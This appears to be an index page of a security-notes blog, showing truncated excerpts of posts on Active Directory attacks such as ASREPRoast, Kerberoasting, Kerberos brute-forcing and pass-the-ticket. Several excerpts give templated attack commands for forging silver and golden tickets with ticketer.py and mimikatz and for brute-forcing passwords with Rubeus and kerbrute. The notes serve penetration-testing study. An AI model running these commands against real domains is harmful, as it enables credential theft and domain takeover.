AD Initial Attack Vectors

LLMNR Poisoning SMB Relay Attacks Responder msfconsole Impacket psexec smbexec wmiexec IPv6 Attacks IPv6 DNS Takeover Mitm6 https://github.com/dirkjanm/mitm6 https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

January 21, 2025 · 1 min · 19 words

AD Mind Map

Active Directory Pentest Mind Map https://www.xmind.net/m/5dypm8/# https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/ [[Active-Directory-Penetration-Manual_1.png]]

January 21, 2025 · 1 min · 9 words

ASREPRoast

2 ASREPRoast user with “Do not require Kerberos pre-authentication” enabled in AD that is disabled by default. allows anyone to send AS_REQ to KDC on the user’s behalf and receive AS_REP message that contains encrypted data with original user key derived from its password. Crack the hash to retrieve password. no domain accounts required; just connectivity to KDC (DC) however, with a domain account, users w/o Kerberos pre-auth in the domain can be retrieved via an LDAP query: (&(samAccountType=805306368)(userAccountControl:1....

January 21, 2025 · 1 min · 172 words

Golden Ticket

7. Golden ticket similar to Silver Ticket craft TGT using NTLM hash of the krbtgt AD account allows access to any machine in the domain hash obtained from the LSASS process or the NTDS.dit file of any DC in the domain Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME kerberos::ptt TICKET....

January 21, 2025 · 1 min · 89 words

Kerberoasting

3. Kerberoasting harvesting TGS for services running on behalf of user accounts TGS tickets to be cracked to retrieve user password requires domain account allowed to request TGS; typically any domain account since no special privileges required LDAP query to retrieve user accounts with associated services: (&(samAccountType=805306368)(servicePrincipalName=*)) first parameter: request user accounts ONLY (no computer accounts) second parameter: filter by accounts with at least 1 service Tools: impacket’s GetUserSPNs.py (Linux), Rubeus (Windows) Linux GetUserSPNs....

January 21, 2025 · 2 min · 225 words

Kerberos Attacks Cheatsheet

Kerberos Attacks Cheatsheet https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a Kerberos cheatsheet Bruteforcing With kerbrute.py: python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file> With Rubeus version with brute module: # with a list of users .\\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file> # check passwords for all users in current domain .\\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> ASREPRoast With Impacket example GetNPUsers.py: # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> # check ASREPRoast for a list of users (no credentials required) python GetNPUsers....

January 21, 2025 · 5 min · 881 words

Kerberos Bruteforce

1. Kerberos brute-force no domain accounts required; just connectivity to KDC (DC) Kerberos pre-auth errors not logged in AD as normal logon failure (event 4625) but as specific Kerberos pre-auth failure (event 4771) will increment failed login counts Kerberos indicates whether username is correct regardless of correct/incorrect password good for: brute-forcing user:pass combos or single user against wordlist enumerating usernames password spraying against userlist possible to discover accounts w/o pre-auth requirements which is useful for ASREPRoast attacks NOTE: a brute-force attack is always susceptible to being detected and blocked, hence, should be used with care....

January 21, 2025 · 1 min · 169 words

Pass the Key

4. Pass the key aka Overpass The Hash use user’s NTLM hash to request Kerberos tickets as alternative to Pass The Hash over NTLM protocol requires: a system where NTLM authentication is disabled and only Kerberos authentication is allowed NTLM hash or password of target user results in access to service/machine which target user has permissions to (get shell) Tools: impacket’s getTGT.py & psexec.py (Linux), Rubeus (Windows) Linux getTGT.py DOMAIN/USERNAME -dc-ip $IP -hashes :NTHASH export KRB5CCNAME=USERNAME....

January 21, 2025 · 1 min · 91 words

Pass the Ticket

5. Pass the ticket similar to Pass The Key steals ticket instead of requesting ticket via known hash in Linux, tickets are stored in credential caches (ccache) 3 main locations: files, /tmp/krb5cc_%{uid} (default) Kernel Keyrings - special space in Linux kernel for storing keys process memory - used when only one process needs to use the ticket in Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process responsible for security....

January 21, 2025 · 1 min · 163 words

Silver Ticket

6. Silver ticket craft valid TGS for a service after owning NTLM hash of an account gain access of that service by forging custom TGS with max privilege Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME kerberos::ptt TICKET.kirbi or use Rubeus to do the same...

January 21, 2025 · 1 min · 80 words